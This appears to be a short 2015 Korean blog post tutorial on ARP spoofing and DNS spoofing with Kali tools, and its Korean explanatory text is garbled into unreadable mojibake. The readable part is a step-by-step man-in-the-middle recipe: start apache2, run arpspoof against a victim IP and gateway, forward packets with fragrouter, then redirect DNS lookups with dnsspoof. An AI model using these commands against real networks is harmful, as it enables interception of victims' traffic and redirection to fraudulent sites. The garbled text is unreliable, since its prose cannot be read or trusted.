Metasploit

Arp Spoofing & DNS Spoofing

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2015. 12. 6.
728x90
๋ฐ˜์‘ํ˜•

Arp Spoofing


๊ทผ๊ฑฐ๋ฆฌ ํ†ต์‹ ๋ง์—์„œ Arp ๋ฅผ ์ด์šฉํ•˜์—ฌ ์ƒ๋Œ€๋ฐฉ์˜ ๋ฐ์ดํ„ฐ ํŒจํ‚ท์„ ์ค‘๊ฐ„์—์„œ ๊ฐ€๋กœ์ฑ„๋Š” ์ค‘๊ฐ„์ž ๊ณต๊ฒฉ์„ ๋งํ•œ๋‹ค. 


DNS Spoofing

 

๋„๋ฉ”์ธ ๋„ค์ž„ ์‹œ์Šคํ…œ์—์„œ ์ „๋‹ฌ๋˜๋Š” IP ์ฃผ์†Œ๋ฅผ ๋ณ€์กฐํ•˜๊ฑฐ๋‚˜ ๋„๋ฉ”์ธ ๋„ค์ž„ ์‹œ์Šคํ…œ์˜ ์„œ๋ฒ„๋ฅผ ์žฅ์•…ํ•˜์—ฌ ์‚ฌ์šฉ์ž๊ฐ€ ์˜๋„ํ•˜์ง€ ์•Š์€ ์ฃผ์†Œ๋กœ ์ ‘์†ํ•˜๊ฒŒ ๋งŒ๋“œ๋Š” ๊ณต๊ฒฉ์ด๋‹ค.





์ฃผ์˜!! ์•…์˜์ ์œผ๋กœ ์‚ฌ์šฉํ•˜๋Š” ์ฑ…์ž„์€ ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค..



1. service apache2 start ๋ผ๋Š” ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•จ์œผ๋กœ apache2๋ฅผ ์‹คํ–‰์‹œํ‚จ๋‹ค.



2. arpspoof -i [interface] -t [victim IP] [gatewayIP] ์ด ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ arpspoofing์„ ํ•œ๋‹ค.




3. fragrouter -B1 ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ ํฌํŠธํฌ์›Œ๋”ฉ์„ ํ•˜์—ฌ ์ค€๋‹ค.



4. dnsspoof -i [interface] -f [dns.hosts ํŒŒ์ผ] ์ด๋ ‡๊ฒŒ ์‹คํ–‰์„ ํ•˜๊ฒŒ ๋˜๋ฉด 




๋ณ€์กฐ!!!




ettercap์ด๋ผ๋Š” kali ๊ธฐ๋Šฅ๋„ ์ข‹๋‹ค.!



[์ฐธ๊ณ ] http://blog.naver.com/agboy/220495887744

728x90
๋ฐ˜์‘ํ˜•

'Metasploit' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

msfvenom  (0) 2015.12.06
msf ์ด์šฉํ•˜๊ธฐ // beEF ์‚ฌ์šฉ๋ฒ•  (0) 2015.12.06
msf ์ด์šฉํ•˜๊ธฐ2  (0) 2015.12.02
msfconsole ์ด์šฉํ•˜๊ธฐ  (0) 2015.12.01
kali linux ์—์„œ์˜ msf  (0) 2015.12.01

๋Œ“๊ธ€